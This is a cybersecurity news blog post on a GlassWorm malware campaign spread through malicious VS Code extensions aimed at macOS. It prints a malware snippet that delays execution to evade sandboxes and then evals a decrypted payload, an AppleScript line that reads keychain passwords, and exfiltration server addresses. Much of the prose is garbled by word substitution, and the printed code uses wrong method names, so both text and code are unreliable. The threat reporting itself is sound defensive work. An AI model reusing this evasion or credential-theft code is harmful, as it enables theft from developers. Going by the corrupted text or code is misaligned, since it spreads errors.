Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Self-Propagating GlassWorm Weaponizing VS Code Extensions to Attack macOS Users

Posted on December 31, 2025December 31, 2025 By CWS

A brand new wave of GlassWorm malware has emerged, marking a major shift in focusing on technique from Home windows to macOS programs. This self-propagating worm, distributed by malicious VS Code extensions on the Open VSX market, has already amassed over 50,000 downloads.

The fourth wave introduces a number of regarding adjustments together with encrypted payloads, {hardware} pockets trojanization capabilities, and complicated sandbox evasion methods that permit it to bypass conventional safety scanning instruments.

The menace actor behind GlassWorm has confirmed remarkably adaptive, evolving by 4 distinct waves since October. Earlier campaigns relied on invisible Unicode characters and compiled Rust binaries to hide malicious code.

The newest iteration abandons these approaches in favor of AES-256-CBC encrypted JavaScript payloads particularly engineered for macOS environments.

Prettier Professional on open-vsx (Supply – Koi)

Three suspicious extensions have been flagged on the Open VSX market: pro-svelte-extension, vsce-prettier-pro, and full-access-catppuccin-pro-extension, all related by shared infrastructure and encryption keys.

The malware employs a Solana blockchain-based command and management infrastructure that makes takedown efforts almost unimaginable.

By posting transaction memos containing base64-encoded URLs to the blockchain, the attacker maintains decentralized management that can not be disrupted by conventional area blocking.

Researchers traced the infrastructure to IP tackle 45.32.151.157, which was additionally used within the third wave, confirming continuity of the menace actor.

Koi analysts recognized the malware by behavioral evaluation after their threat engine detected uncommon patterns in extension conduct and community communications.

Encrypted Payload and Sandbox Evasion Ways

The fourth wave introduces a intelligent timing mechanism designed to evade automated safety evaluation. As soon as put in, the malicious extension waits precisely quarter-hour earlier than executing its payload.

This delay is crucial as a result of most sandbox environments timeout after 5 minutes, that means the malware seems utterly benign throughout automated scanning.

The code comprises a hardcoded worth of 9e5 milliseconds (900,000 milliseconds equals quarter-hour), which triggers the decryption and execution of the AES-256-CBC encrypted payload.

setTimeout(() => {
const decrypted = crypto.createDecipheriv(‘aes-256-cbc’, key, iv);
let payload = decrypted.replace(encryptedData, ‘base64’, ‘utf8’);
payload += decrypted.remaining(‘utf8’);
eval(payload);
}, 9e5);

Encrypted payload execution (Supply – Koi)

The payload itself is embedded at line 64 of the primary extension file, encrypted with a hardcoded key and initialization vector that is still constant throughout all three malicious extensions.

This shared cryptographic infrastructure confirms a single menace actor is accountable for the marketing campaign.

After the delay interval expires, the malware retrieves the present command-and-control endpoint from the Solana blockchain and executes any directions it receives.

The macOS-specific payload consists of AppleScript for stealth execution, LaunchAgents for persistence somewhat than Home windows Registry keys, and direct entry to the macOS Keychain database to retrieve saved passwords and credentials.

set keychainPassword to do shell script “safety find-generic-password -s ‘password_service’ -w”

The malware additionally consists of the potential to exchange {hardware} pockets purposes with trojanized variations, focusing on each Ledger Reside and Trezor Suite.

Whereas the pockets substitute performance was not absolutely energetic throughout testing on December 29, 2025, the code infrastructure is full and awaiting payload uploads.

The malware validates that downloaded information exceed 1000 bytes earlier than set up, stopping damaged installations which may alert victims.

All stolen information will get staged within the momentary listing /tmp/ijewf/, compressed, and despatched to the exfiltration server at 45.32.150.251/p2p for attacker retrieval.

Comply with us on Google Information, LinkedIn, and X to Get Extra Immediate Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Attack, Code, Extensions, GlassWorm, macOS, SelfPropagating, Users, Weaponizing

Post navigation

Previous Post: Trust Wallet Chrome Extension Hack Drains $8.5M via Shai-Hulud Supply Chain Attack
Next Post: How To Browse Faster and Get More Done Using Adapt Browser

Related Posts

700+ Malicious Android Apps Abusing NFC Relay to Exfiltrate Banking Login Credentials Cyber Security News
Checkpoint Details on How Attackers Drained $128M from Balancer Pools Within 30 Minutes Cyber Security News
Proxyware Malware Mimic as YouTube Video Download Site Delivers Malicious Javascripts Cyber Security News
Midnight Ransomware Decrypter Flaws Opens the Door to File Recovery Cyber Security News
Historic Great Firewall Breach – 500GB+ Censorship Data Exposed Cyber Security News
Microsoft Defender for Office 365 New Dashboard to Provide More Details Across a Range of Threat Vectors Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Hackers Expose All User Records from Popular Dark Web Forum
  • China-Linked Hackers Exploit VMware ESXi Zero-Days to Escape Virtual Machines
  • xRAT Malware Attacking Windows Users Disguised as Adult Game
  • Fog Ransomware Attacking US Organizations Leveraging Compromised VPN Credentials
  • In Other News: 8,000 Ransomware Attacks, China Hacked US Gov Emails, IDHS Breach Impacts 700k

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Hackers Expose All User Records from Popular Dark Web Forum
  • China-Linked Hackers Exploit VMware ESXi Zero-Days to Escape Virtual Machines
  • xRAT Malware Attacking Windows Users Disguised as Adult Game
  • Fog Ransomware Attacking US Organizations Leveraging Compromised VPN Credentials
  • In Other News: 8,000 Ransomware Attacks, China Hacked US Gov Emails, IDHS Breach Impacts 700k

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark